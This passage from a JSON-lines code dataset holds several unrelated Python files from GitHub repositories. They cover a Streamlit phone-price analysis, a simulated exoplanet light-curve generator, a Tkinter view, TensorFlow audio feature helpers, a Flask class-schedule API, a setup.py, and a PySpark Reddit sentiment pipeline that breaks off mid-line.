\",\r\n unsafe_allow_html=True,\r\n)\r\n\r\n\r\nst.subheader(\"Here is a snapshot of the dataset:\")\r\nst.write(df.head())\r\n\r\nst.markdown(\r\n \"\"\"\r\n| Column Name | Description |\r\n| :-------------: |:-------------:| \r\n| battery_power | Total energy a battery can store in one time measured in mAh | \r\n| blue | Has bluetooth or not | \r\n| clock_speed | speed at which microprocessor executes instructions | \r\n| dual_sim | Has dual sim support or not | \r\n| fc | Front Camera mega pixels | \r\n| four_g | Has 4G or not | \r\n| int_memory | Internal Memory in Gigabytes | \r\n| m_dep | Mobile Depth in cm | \r\n| mobile_wt | Weight of mobile phone | \r\n| n_cores | Number of cores of processor | \r\n| pc | Primary Camera mega pixels | \r\n| px_height | Pixel Resolution Height | \r\n| px_width | Pixel Resolution Width | \r\n| ram | Random Access Memory in Mega Bytes | \r\n| sc_h | Screen Height of mobile in cm | \r\n| sc_w | Screen Width of mobile in cm | \r\n| talk_time | longest time that a single battery charge will last on a phone call | \r\n| three_g | Has 3G or not | \r\n| touch_screen | Has touch screen or not | \r\n| wifi | Has wifi or not | \r\n| price_range | This is the target variable with value of 0(low cost), 1(medium cost), 2(high cost) and 3(very high cost) | \r\n\r\n\"\"\"\r\n)\r\n\r\nst.markdown(\"\\n\")\r\nst.markdown(\"\\n\")\r\n\r\nfig1 = plt.figure()\r\nsns.boxenplot(df.price_range, df.ram)\r\nplt.ylabel(\"RAM (in MB)\")\r\nplt.xlabel(\"Price\")\r\nplt.xticks(ticks=[0, 1, 2, 3], labels=[\"Low\", \"Medium\", \"High\", \"Very High\"])\r\n\r\nst.markdown(\r\n \" **Exploratory Data Analysis:** \",\r\n unsafe_allow_html=True,\r\n)\r\nst.markdown(\r\n \"Our primary focus will be - determing the **_relationships among features_**.\"\r\n)\r\nst.markdown(\"**Conclusively, we will evaluate whether this dataset is real or not.**\")\r\n\r\nst.markdown(\"Let's start with a Box plot of **Price** vs **RAM**\")\r\n\r\nst.write(fig1)\r\n\r\nst.markdown(\r\n \"RAM size and phone price are *__positively correlated__*! This makes intuitive sense.\"\r\n)\r\n\r\nst.markdown(\r\n \"Now a look at a Bar plot of **Number of phones that have a Touch Screen** and **color coding them with their respective price ranges**:\"\r\n)\r\n\r\nfig2 = plt.figure()\r\nsns.set_style(\"whitegrid\")\r\nsns.countplot(df.touch_screen, hue=df.price_range, palette=\"spring\")\r\nplt.xlabel(\"Touch Screen\")\r\nplt.xticks(ticks=[0, 1], labels=[\"No\", \"Yes\"])\r\nplt.legend(\r\n labels=[\"Low\", \"Moderate\", \"High\", \"Very High\"],\r\n shadow=True,\r\n loc=\"lower right\",\r\n title=\"Price\",\r\n fontsize=\"small\",\r\n)\r\n\r\nst.write(fig2)\r\n\r\nst.markdown(\r\n \"It appears that phones with touchscreens and no touchscreens are almost equally \\\r\n distributed among different price ranges. However, **it makes little sense that there\\\r\n are such a large number of _high_ and _very high_ priced phones with no touchscreens!** \\\r\n (in fact higher than their corresponding _low_ and _modernate_ price categories)\"\r\n)\r\n\r\nst.markdown(\r\n \"Next we are going to engineer a new feature! Dividing the pixel \\\r\n resolution height (*px_height*) by screen height in cm (*sc_h*) - we get \\\r\n pixels per cm of height. For simplicity, we will call this ** ppcm ** . 
\"\r\n)\r\n\r\ndf[\"ppcm\"] = df.px_height / df.sc_h\r\n\r\nst.write(df[[\"px_height\", \"sc_h\", \"ppcm\"]].head())\r\n\r\nst.markdown(\"Let's observe the median of ppcm of different price categories-\")\r\n\r\nfig3 = plt.figure()\r\nsns.set_style(\"darkgrid\")\r\nsns.barplot(df.price_range, df.ppcm, palette=\"ocean\")\r\nplt.ylabel(\"Median pixels per cm\")\r\nplt.xlabel(\"Price\")\r\nplt.xticks(ticks=[0, 1, 2, 3], labels=[\"Low\", \"Medium\", \"High\", \"Very High\"])\r\n\r\nst.write(fig3)\r\n\r\nst.markdown(\r\n \"_Low_ priced phones have a lower pixels per cm as compared to _High_ and _Very \\\r\n High_ priced phones. With the excpetion of _Moderately_ priced phones - where the \\\r\n median of ppcm is higher than that of _High_ priced phones, there seems to be a clear \\\r\n upward trend - **higher priced phones have a higher pixel density, which is the \\\r\n result of a sharper screen resolution.** This makes perfect intuitive sense as well!\"\r\n)\r\n\r\n\r\n# figx = alt.Chart(df).mark_point().encode(alt.X(\"pc:Q\"), alt.Y(\"fc:Q\"),)\r\n\r\n# st.altair_chart(figx, use_container_width=True)\r\n\r\nfig4 = plt.figure()\r\nsns.set_style(\"whitegrid\")\r\nsns.pointplot(\r\n df.four_g,\r\n df.clock_speed,\r\n hue=df.price_range,\r\n scale=1.3,\r\n dodge=True,\r\n palette=\"Set1\",\r\n)\r\nplt.ylabel(\"Processor Clock Speed (GHz)\")\r\nplt.xlabel(\"4G Enabled\")\r\nplt.xticks(ticks=[0, 1], labels=[\"No\", \"Yes\"])\r\nplt.legend(\r\n shadow=True, title=\"Price\", fontsize=\"small\",\r\n)\r\n\r\nst.write(fig4)\r\n\r\nst.markdown(\r\n \"An interesting trend that can be observed here is that category **_3_** priced \\\r\n (very high priced) phones have a higher clock speed on non - 4G enabled phones as \\\r\n compared to 4G enabled phones. \\\r\n This seems a little weird - as 4G enabled phones need faster (higher) clock rates\\\r\n than non - 4G enabled phones. This trend appears to be inverse for very high priced\\\r\n phones.\"\r\n)\r\n\r\n\r\nst.markdown(\r\n \"The next visualization is unfortunately our last - but it is special - it is interactive!\\\r\n We will take a look at ** RAM ** vs ** pixels per cm ** feature that we engineered earlier.\\\r\n Below this scatterplot, there is going to be a bar chart denoting the number of mobile phones\\\r\n belonging to that price range. This bar chart changes with the area selected on the scatterplot.\\\r\n *Please note that this is an interactive plot, so please go ahead and make a selection\\\r\n on the plot and watch the bar chart below change!*\"\r\n)\r\n\r\nbrush = alt.selection(type='interval')\r\n\r\npoints = alt.Chart(df).mark_point().encode(\r\n x='ram:Q',\r\n y='ppcm:Q',\r\n color=alt.condition(brush, 'price_range:N', alt.value('lightgray'))\r\n).properties(\r\n width=700,\r\n height=400).add_selection(\r\n brush\r\n)\r\n\r\nbars = alt.Chart(df).mark_bar().encode(\r\n y='price_range:N',\r\n color='price_range:N',\r\n x='count(price_range):Q'\r\n).properties(\r\n width=700).transform_filter(\r\n brush\r\n)\r\n\r\nst.altair_chart(points & bars, use_container_width=True)\r\n\r\nst.markdown(\"Ideally, the trend needs to upwards and positive - as expensive phones have higher pixel densities \\\r\nand more RAM. But there is something very unsettling here. We can observe that there are some phones which are in \\\r\n the ** very high (3)** price range and still have pretty poor pixel densities \\\r\n (lower right section of the scatterplot, populated by blue circles). This is not the case in a real world scenario. 
\\\r\n Such phones rarely get released and have extremely limited scope to attract customers generate revenue. \")\r\n\r\nst.markdown(\"\\n\")\r\n\r\nst.markdown(\"** Our final conclusion is that apart from the RAM feature, the other features _do NOT reflect real-world phone feature vs price relationships._\\\r\n This dataset might be synthetically generated with RAM being the only properly correlated feature. **\")","repo_name":"yashwantreddy/MobilePhones","sub_path":"streamlit_demo.py","file_name":"streamlit_demo.py","file_ext":"py","file_size_in_byte":7745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
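The interactive section in the record above links an Altair scatterplot to a bar chart through an interval selection. A minimal self-contained sketch of that brush-linking pattern, using a toy dataframe in place of the phone dataset (column values below are made up):

```python
import altair as alt
import numpy as np
import pandas as pd

# Toy stand-in for the phone dataset; values are illustrative only.
rng = np.random.default_rng(0)
df = pd.DataFrame({
    "ram": rng.integers(256, 4000, 200),
    "ppcm": rng.uniform(10, 200, 200),
    "price_range": rng.integers(0, 4, 200),
})

brush = alt.selection(type="interval")  # drag on the scatterplot to select

# Points outside the brushed region fall back to light gray.
points = alt.Chart(df).mark_point().encode(
    x="ram:Q", y="ppcm:Q",
    color=alt.condition(brush, "price_range:N", alt.value("lightgray")),
).add_selection(brush)

# The bar chart only counts rows inside the brushed region.
bars = alt.Chart(df).mark_bar().encode(
    y="price_range:N", x="count():Q", color="price_range:N",
).transform_filter(brush)

chart = points & bars  # vertical concatenation; bars update as the brush moves
```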
+{"seq_id":"19632002379","text":"import matplotlib.pyplot as plt\nimport george\nimport itertools\nimport numpy as np\nimport batman\nimport os\n\ndef reverse_ld_coeffs(ld_law, q1, q2):\n if ld_law == 'quadratic':\n coeff1 = 2.*np.sqrt(q1)*q2\n coeff2 = np.sqrt(q1)*(1.-2.*q2)\n elif ld_law=='squareroot':\n coeff1 = np.sqrt(q1)*(1.-2.*q2)\n coeff2 = 2.*np.sqrt(q1)*q2\n elif ld_law=='logarithmic':\n coeff1 = 1.-np.sqrt(q1)*q2\n coeff2 = 1.-np.sqrt(q1)\n elif ld_law == 'linear':\n return q1,q2\n return coeff1,coeff2\n\ndef init_batman(t,law):\n \"\"\" \n This function initializes the batman code.\n \"\"\"\n params = batman.TransitParams()\n params.t0 = 0. \n params.per = 1. \n params.rp = 0.1 \n params.a = 15. \n params.inc = 87. \n params.ecc = 0. \n params.w = 90. \n if law == 'linear':\n params.u = [0.5]\n else:\n params.u = [0.1,0.3]\n params.limb_dark = law \n m = batman.TransitModel(params,t)\n return params,m\n\ndef get_transit_model(t,t0,P,p,a,inc,q1,q2,ld_law):\n params,m = init_batman(t,law=ld_law)\n coeff1,coeff2 = reverse_ld_coeffs(ld_law, q1, q2) \n params.t0 = t0\n params.per = P \n params.rp = p \n params.a = a\n params.inc = inc\n if ld_law == 'linear':\n params.u = [coeff1]\n else:\n params.u = [coeff1,coeff2]\n return m.light_curve(params)\n\ninputs = np.genfromtxt('w19_parameters.dat',unpack=True)\n\n# Standarize the inputs:\nfor i in range(len(inputs)):\n norm_input = (inputs[i] - np.mean(inputs[i]))/np.sqrt(np.var(inputs[i]))\n if i == 0:\n X = norm_input\n times = inputs[i]\n else:\n X = np.vstack((X,norm_input))\n\n# Define base flux (white) noise:\nsigma = 200*1e-6\nyerr = np.ones(len(times))*sigma\n\n# Define maximum variance (i.e., the total variance of the GP):\nmax_sigma = 2000.\nmax_var = (max_sigma*1e-6)**2\n\n# Define number of simulations:\nnsims = 300\n\n# Define transit model:\nt0 = times[len(times)/2]\nP = 3.0\np = 0.1\naR = 10.\ninc = 88.0\nq1,q2 = 0.5,0.5\nmodel = get_transit_model(times.astype('float64'),t0,P,p,aR,inc,q1,q2,'quadratic')\n\n# Name of the variables:\nnames = ['times','Deltas','FWHM','Z','g','trace']\nidx_names = range(len(names))\n\n# Generate all possible combinations of external parameters, and generate datasets:\nfor L in range(0, len(idx_names)+1):\n for subset in itertools.combinations(idx_names, L):\n if len(subset) != 0:\n for n in range(nsims):\n if n == 0:\n cnames = list( names[i] for i in subset)\n fname = '_'.join(cnames)\n os.mkdir(fname)\n fout = open(fname+'/dataset_'+str(n)+'.dat','w')\n # Generate nsims datasets per model:\n Xc = X[subset,:]\n # Generate gaussian process. 
For this, sample lambdas from uniform distribution:\n ndim = Xc.shape[0]\n lambdas = np.random.uniform(0,10,ndim)\n fout.write('# Lambdas: '+' '.join(lambdas.astype('str'))+' | Sigma: '+str(sigma*1e6)+' ppm | Max (GP) Sigma: '+str(max_sigma)+' ppm\\n')\n fout.write('# Times \\t Simulated data \\t Transit Model \\t GP\\n')\n # Compute kernel:\n kernel = max_var*george.kernels.ExpSquaredKernel(lambdas,ndim=ndim,axes=range(ndim))\n # Prepare GP object:\n gp = george.GP(kernel)\n gp.compute(Xc.T)\n # Sample GP, add gaussian noise and save\n GP = gp.sample(Xc.T)\n noise = np.random.normal(0.,sigma,len(times))\n total = model + GP + noise\n for i in range(len(times)):\n fout.write('{0:.10f} \\t {1:.10f} \\t {2:.10f} \\t {3:.10f}\\n'.format(times[i],total[i],model[i],GP[i]))\n","repo_name":"nespinoza/GPOS","sub_path":"data_generator/generate_datasets.py","file_name":"generate_datasets.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
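The generator above draws correlated systematics by sampling a squared-exponential GP over the standardized regressors. A minimal sketch of that sampling step with george, reduced to a single regressor (the amplitude and length scale below are illustrative, not the script's values):

```python
import george
import numpy as np

# One regressor, 100 points; kernel amplitude and length scale are illustrative.
x = np.linspace(0, 1, 100)
kernel = (2000e-6) ** 2 * george.kernels.ExpSquaredKernel(0.1)

gp = george.GP(kernel)
gp.compute(x)                # factorize the covariance at the input locations
correlated = gp.sample(x)    # one draw of correlated "systematic" noise
white = np.random.normal(0.0, 200e-6, x.size)
simulated = correlated + white  # the transit model would be added on top
```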
+{"seq_id":"26371789215","text":"import tkinter as tk\nfrom tkinter import Frame, ttk\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom matplotlib.figure import Figure\n\nclass Vista_Pestaña1:\n def __init__(self, controlador):\n self.controlador = controlador\n\n self.ventanaP1 = tk.Tk()\n self.ventanaP1.title(\"Datos Generales\")\n self.ventanaP1.geometry(\"1200x700\")\n self.ventanaP1.resizable(False, False)\n\n self.main_frame = tk.Frame(self.ventanaP1)\n self.main_frame.pack(fill=tk.BOTH, expand=True)\n\n self.left_frame = tk.Frame(self.main_frame)\n self.left_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n\n self.right_frame = tk.Frame(self.main_frame)\n self.right_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n\n self.create_treeview()\n self.create_plot()\n self.label1 = tk.Label(self.left_frame, text=\"Nombre del archivo\")\n self.label1.pack()\n self.entry1 = tk.Entry(self.left_frame)\n self.entry1.pack()\n self.crear_boton()\n def agregar_datosarbolpestaña1(self, datos):\n for fila in self.tree1.get_children():\n self.tree1.delete(fila)\n for indice, fila in enumerate(datos):\n valores = fila\n self.tree1.insert('', 'end', text=str(indice), values=valores)\n def create_treeview(self):\n self.tree1 = ttk.Treeview(self.right_frame, height=20)\n self.tree1['columns'] = ('Columna1', 'Columna2', 'Columna3','Columna4')\n\n self.tree1.heading('#0', text='Índice')\n self.tree1.column('#0', anchor=tk.CENTER, width=80)\n self.tree1.heading('Columna1', text='Fuerza Horizontal \\n N')\n self.tree1.column('Columna1', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna2', text='Desplazamiento Horizontal \\n mm')\n self.tree1.column('Columna2', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna3', text='Desplazamiento Vertical \\n mm')\n self.tree1.column('Columna3', anchor=tk.CENTER, width=100)\n self.tree1.heading('Columna4', text='Esfuerzo cortante')\n self.tree1.column('Columna4', anchor=tk.CENTER, width=100)\n self.tree1.pack(side=tk.LEFT, padx=10, pady=10)\n\n def create_plot(self):\n fig1 = Figure(figsize=(5, 4), dpi=100)\n ax1 = fig1.add_subplot(111)\n x = [0, 0.4, 0.8, 1.2, 1.6, 2, 2.4, 2.8, 3.2, 3.6, 4]\n y = [0, 3.514132926, 5.551311434, 6.977336389, 7.894066718, 8.148714031, 8.148714031, 8.148714031, 8.148714031,\n 8.148714031, 8.148714031]\n ax1.scatter(x, y)\n ax1.plot(x, y, 'r-') # 'r-' indica una línea roja\n\n canvas = FigureCanvasTkAgg(fig1, master=self.left_frame)\n canvas.draw()\n canvas.get_tk_widget().pack(padx=10, pady=10)\n def crear_boton(self):\n self.boton = tk.Button(self.left_frame, text=\"Generar Graficas\", command=self.controlador.generar_pdf,\n width=25, height=5, borderwidth=2)\n self.boton.pack()\n def obtener_nombreArchivo(self):\n return self.entry1.get()\n def cerrar_pestaña(self):\n self.ventanaP1.destroy()\n def iniciar(self):\n self.ventanaP1.mainloop()","repo_name":"yair-r/nueva_MCD","sub_path":"Vista/vista_pestaña1.py","file_name":"vista_pestaña1.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71807424374","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport librosa as lb\nfrom librosa.display import specshow\n\n# Drop axis since data is only single channel\ndef squeeze(audio, labels):\n audio = tf.squeeze(audio, axis=-1)\n #audio = tf.expand_dims(audio, axis=-1)\n return audio, labels\n\ndef get_features(waveform, sample_rate):\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrogram = tf.abs(stfts)\n\n num_spectrogram_bins = stfts.shape[-1]\n lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n upper_edge_hertz)\n mel_spectrogram = tf.tensordot(\n spectrogram, linear_to_mel_weight_matrix, 1)\n mel_spectrogram.set_shape(spectrogram.shape[:-1].concatenate(\n linear_to_mel_weight_matrix.shape[-1:]))\n\n # Compute a stabilized log to get log-magnitude mel-scale spectrograms.\n log_mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)\n # Compute MFCCs from log_mel_spectrograms and take the first 13.\n mfcc = tf.signal.mfccs_from_log_mel_spectrograms(\n log_mel_spectrogram)[..., :128]\n\n features = tf.stack([spectrogram, mel_spectrogram, mfcc], axis=-1)\n #all_four = tf.squeeze(all_four, axis=1)\n return features\n\n\ndef get_spectrogram(waveform):\n # Convert the waveform to a spectrogram via a STFT.\n spectrogram = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n # Obtain the magnitude of the STFT.\n spectrogram = tf.abs(spectrogram)\n # Add a `channels` dimension, so that the spectrogram can be used\n # as image-like input data with convolution layers (which expect\n # shape (`batch_size`, `height`, `width`, `channels`).\n spectrogram = spectrogram[..., tf.newaxis]\n return spectrogram\n\ndef get_melspec(waveform, sample_rate):\n # A 1024-point STFT with frames of 64 ms and 75% overlap.\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrograms = tf.abs(stfts)\n\n # Warp the linear scale spectrograms into the mel-scale.\n num_spectrogram_bins = stfts.shape[-1]\n lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n upper_edge_hertz)\n mel_spectrograms = tf.tensordot(\n spectrograms, linear_to_mel_weight_matrix, 1)\n mel_spectrograms.set_shape(spectrograms.shape[:-1].concatenate(\n linear_to_mel_weight_matrix.shape[-1:]))\n\n mel_spectrograms = mel_spectrograms[..., tf.newaxis]\n\n return mel_spectrograms\n\ndef get_mfcc(waveform, sample_rate):\n\n # A 1024-point STFT with frames of 64 ms and 75% overlap.\n stfts = tf.signal.stft(waveform, frame_length=255, frame_step=128)\n spectrograms = tf.abs(stfts)\n\n # Warp the linear scale spectrograms into the mel-scale.\n num_spectrogram_bins = stfts.shape[-1]\n lower_edge_hertz, upper_edge_hertz, num_mel_bins = 80.0, 7600.0, 80\n linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,\n upper_edge_hertz)\n mel_spectrograms = tf.tensordot(\n spectrograms, linear_to_mel_weight_matrix, 1)\n mel_spectrograms.set_shape(spectrograms.shape[:-1].concatenate(\n linear_to_mel_weight_matrix.shape[-1:]))\n\n # Compute a stabilized log to get log-magnitude mel-scale spectrograms.\n log_mel_spectrograms = tf.math.log(mel_spectrograms + 
1e-6)\n # Compute MFCCs from log_mel_spectrograms and take the first 13.\n mfccs = tf.signal.mfccs_from_log_mel_spectrograms(\n log_mel_spectrograms)[..., :13]\n mfccs = mfccs[..., tf.newaxis]\n\n return mfccs\n\n# Function to display spectrogram\ndef plot_spectrogram(spectrogram, ax):\n if len(spectrogram.shape) > 2:\n assert len(spectrogram.shape) == 3\n spectrogram = np.squeeze(spectrogram, axis=-1)\n # Convert the frequencies to log scale and transpose, so that the time is\n # represented on the x-axis (columns).\n # Add an epsilon to avoid taking a log of zero.\n log_spec = np.log(spectrogram.T + np.finfo(float).eps)\n height = log_spec.shape[0]\n width = log_spec.shape[1]\n X = np.linspace(0, np.size(spectrogram), num=width, dtype=int)\n Y = range(height)\n ax.pcolormesh(X, Y, log_spec)\n\n# Create Spectrogram dataset from audio files\ndef make_features_ds(ds, sr):\n return ds.map(\n map_func=lambda audio,label: (get_features(audio, sr), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n\n# Create Spectrogram dataset from audio files\ndef make_melspec_ds(ds, sr):\n return ds.map(\n map_func=lambda audio,label: (get_melspec(audio, sr), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n# Create Spectrogram dataset from audio files\ndef make_mfcc_ds(ds, sr):\n return ds.map(\n map_func=lambda audio,label: (get_mfcc(audio, sr), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n# Create Spectrogram dataset from audio files\ndef make_spec_ds(ds):\n return ds.map(\n map_func=lambda audio,label: (get_spectrogram(audio), label),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n\n# Define function to check if file is in WAV format\ndef is_wav(filename):\n '''\n Checks if files are .wav files\n Utility tool in converting wav to png files\n '''\n return filename.split('.')[-1] == 'wav'\n\ndef opus_to_wav(clips_path, save_path):\n for subdir in os.listdir(clips_path):\n word_path = os.path.join(clips_path, subdir)\n sp = os.path.join(save_path, clips_path[:len(clips_path) - 7][-2:] + \"-\" + subdir)\n os.makedirs(sp)\n print(\"Coverting OPUS to WAV for the\\\"\" + subdir +\"\\\" label\")\n print('++++++++++++++++++++++++++++++++++')\n for recording in os.listdir(word_path):\n recording_path = os.path.join(word_path, recording)\n wav_file = os.path.join(sp, recording.rstrip(\".opus\") + \".wav\")\n if not os.path.exists(wav_file):\n os.system(\"ffmpeg -i \\\"\" + recording_path + \"\\\" \\\"\" + wav_file + \"\\\"\")\n\ndef trim_audio(wav_file_loc):\n y,sr=lb.load(wav_file_loc) #load the file\n trim_file, index = lb.effects.trim(y) # Remove leading and trailing silence\n return trim_file, sr","repo_name":"chrispvasquez/ML-Commands","sub_path":"DLHelperFunctions.py","file_name":"DLHelperFunctions.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
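The three feature extractors in the record above share the same STFT → mel → log-mel → MFCC chain. A quick shape walkthrough on fake audio (1 s at 16 kHz; parameter values copied from the functions above, frame counts computed, not measured):

```python
import tensorflow as tf

sr = 16000
waveform = tf.random.normal([sr])  # 1 second of fake audio

stft = tf.signal.stft(waveform, frame_length=255, frame_step=128)
spectrogram = tf.abs(stft)                       # (frames, 129) magnitude bins

mel_w = tf.signal.linear_to_mel_weight_matrix(
    80, spectrogram.shape[-1], sr, 80.0, 7600.0)
mel = tf.tensordot(spectrogram, mel_w, 1)        # (frames, 80) mel bins

log_mel = tf.math.log(mel + 1e-6)                # stabilized log
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel)[..., :13]

print(spectrogram.shape, mel.shape, mfcc.shape)  # (124, 129) (124, 80) (124, 13)
```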
+{"seq_id":"15620276340","text":"# File name: app.py\r\n# Author: Benjamin Corn\r\n# Date created: 2/20/2016\r\n# Date last modified: 2/25/2016\r\n# Python Version: 3.0\r\n\r\nfrom flask import Flask\r\nfrom flask.ext.sqlalchemy import SQLAlchemy\r\nfrom flask.ext.restless import APIManager\r\n\r\n# Starting new Flask app\r\napp = Flask(__name__)\r\n\r\n# Starting new sqlite database connection\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///classdata.db'\r\ndb = SQLAlchemy(app)\r\n\r\n\r\n# RESTful API database model class\r\nclass Class(db.Model):\r\n\tid = db.Column(db.Integer, primary_key=True)\r\n\tclassnum = db.Column(db.Text)\r\n\tclassname = db.Column(db.Text)\r\n\tprofessor = db.Column(db.Text)\r\n\tclasstype = db.Column(db.Text)\r\n\tseats = db.Column(db.INT)\r\n\tbldgcode = db.Column(db.Text)\r\n\troomcode = db.Column(db.Text)\r\n\tclassdays = db.Column(db.Text)\r\n\tstarttime = db.Column(db.Text)\r\n\tendtime = db.Column(db.Text)\r\n\r\n# Push all structures to database\r\ndb.create_all()\r\n\r\n# Creating APIManager from restless extension\r\nmanager = APIManager(app, flask_sqlalchemy_db=db)\r\n\r\n# Defining valid HTML requests\r\nclass_blueprint = manager.create_api(Class, methods=['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])\r\n\r\n# Running Flask loop sequence\r\nif __name__ == \"__main__\":\r\n\tapp.run()\r\n","repo_name":"bencorn/BU-Scheduling-API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"38112294391","text":"import os\nfrom setuptools import find_packages, setup\n\nwith open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:\n README = readme.read()\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django-lightcms',\n version='0.1',\n packages=find_packages(include=('lightcms')),\n include_package_data=True,\n license='BSD License', # example license\n description='A cms for developers.',\n long_description=README,\n url='https://github.com/eddmash/django-lightcms',\n author='Eddilbert Macharia',\n author_email='edd.cowan@gmail.com',\n classifiers=[\n ],\n)\n","repo_name":"eddmash/django-lightcms","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73385664692","text":"from pyspark import SparkContext\nfrom pyspark.sql import SQLContext\nimport pyspark.sql.functions as func\nfrom pyspark.sql.functions import from_unixtime\nfrom pyspark.sql.functions import dayofmonth, year, month, col, udf\nfrom pyspark.sql.types import DoubleType\nfrom pyspark.sql import DataFrameWriter\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport string\nimport psycopg2\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\n\nfile_name = \"RC_2005-12.bz2\"\nfile_path = \"s3a://redditcommentsbz2/\" + file_name\n\n# create Spark context\nmaster = os.getenv('master_host')\nsc = SparkContext(master, 'preprocess')\nsqlContext = SQLContext(sc)\n\n# read in data\n\ndata = sqlContext.read.json(file_path).select('created_utc', 'controversiality', 'link_id', 'score', 'body', 'author', 'subreddit', 'id')\\\n .withColumnRenamed('created_utc', 'time').withColumnRenamed('link_id','post_id').withColumnRenamed('body','comment').withColumnRenamed('id','comment_id') # rename columns\ndata = data.filter(~col('comment').isin(['[deleted]', '[removed]'])).filter(~col('author').isin(['[deleted]']))\ndata = data.withColumn('time', from_unixtime(data.time, format='yyyy-MM-dd HH:mm:ss')) # convert unixtime to datetime\ndf = data.withColumn('year', year(data.time)).withColumn('month', month(data.time)).withColumn('day', dayofmonth(data.time)) # calculate year, month, day\n\n# Create sentiment score for each comment\nsid = SentimentIntensityAnalyzer()\n\ndef remove_punctuation(x):\n \"\"\"\n Removes punctuation from comment to calculate sentiment score\n :param: x, str, reddit comment\n :return: nopunc_str, str, comment without punctuation\n \"\"\"\n punc='\"#$%&\\'()*+,-./:;<=>?@[\\\\]^_`{|}~'\n for ch in punc:\n nopunc_str = x.replace(ch, '')\n return nopunc_str\n\ndef vader(x):\n \"\"\"\n Calculates sentiment score of comment.\n :param: x, str, reddit comment with no punctuation\n :return: ss, double, sentiment score\n \"\"\"\n ss = sid.polarity_scores(x)['compound']\n return ss\n\n# apply udf so spark can interpret the functions\nnoPunctuation = udf(lambda x: remove_punctuation(x))\nsentimentScore = udf(lambda x: vader(x))\n\ndf = df.withColumn('clean_comment', noPunctuation(df.comment)) # remove punctuation from comment\ndf = df.withColumn('sentiment', sentimentScore(df.clean_comment)) # calculate sentiment score\ndf = df.withColumn(\"sentiment\", df[\"sentiment\"].cast(\"double\"))\n\n# CREATE TABLES\n\n# create comments table\ncomments = df.select('time', 'year','month','day','post_id','comment_id', 'author', 'comment', 'controversiality', 'score', 'sentiment', 'subreddit')\ncomments.show()\n# create posts table, containing posts and the percentage of negative comments\n#neg_comments = comments.filter(\"sentiment <= -0.7\").groupby('post_id').count()\n#neg_comments = neg_comments.withColumnRenamed(\"count\",\"num_neg_comments\")\n#num_comments_per_post = comments.groupby('post_id').count()\n#num_comments_per_post = num_comments_per_post.withColumnRenamed(\"count\", \"total_comments\")\n#posts = neg_comments.join(num_comments_per_post, 'post_id')\n#posts = posts.withColumn(\"% neg comments\", func.round(neg_comments[\"num_neg_comments\"]/num_comments_per_post[\"total_comments\"],2))\n#posts.show()\n# create user_history table\n#user_avg = df1.select('author','controversiality', 'score', 'sentiment').groupby('author').mean()\n#user_avg = 
user_avg.withColumnRenamed('avg(controversiality)','avg_controversiality').withColumnRenamed('avg(score)','avg_score').withColumnRenamed('avg(sentiment)','avg_sentiment')\n#user_comments = df1.groupby('author').count()\n#user_comments = user_comments.withColumnRenamed('count','num_comments')\n#user_history = user_avg.join(user_comments, 'author')\n#print('USER HISTORY')\n#user_history.show()\n\n# save file\n#comments.repartition(10).write.option('maxRecordsPerFile',100000).mode('overwrite').csv('/reddit_data/')\n\n\n# WRITE TO POSTGRES\ndb_host = os.getenv(\"db_host\")\ndb_password = os.getenv(\"db_password\")\ndb_port = os.getenv(\"db_port\")\ndb_name = os.getenv(\"db_name\")\ndb_url = \"jdbc:postgresql://\" + db_host + ':' + str(db_port) + '/' + db_name\n\ncomments_table_name = \"comments\"\nposts_table_name = \"posts\"\nproperties = {\n \"driver\": \"org.postgresql.Driver\",\n \"user\": db_user,\n \"password\": db_password}\nwrite_mode = 'append'\ncomments.write.jdbc(url = db_url, table = comments_table_name, mode = write_mode, properties = properties)\n#posts.write.jdbc(url = db_url, table = posts_table_name, mode = write_mode, properties = 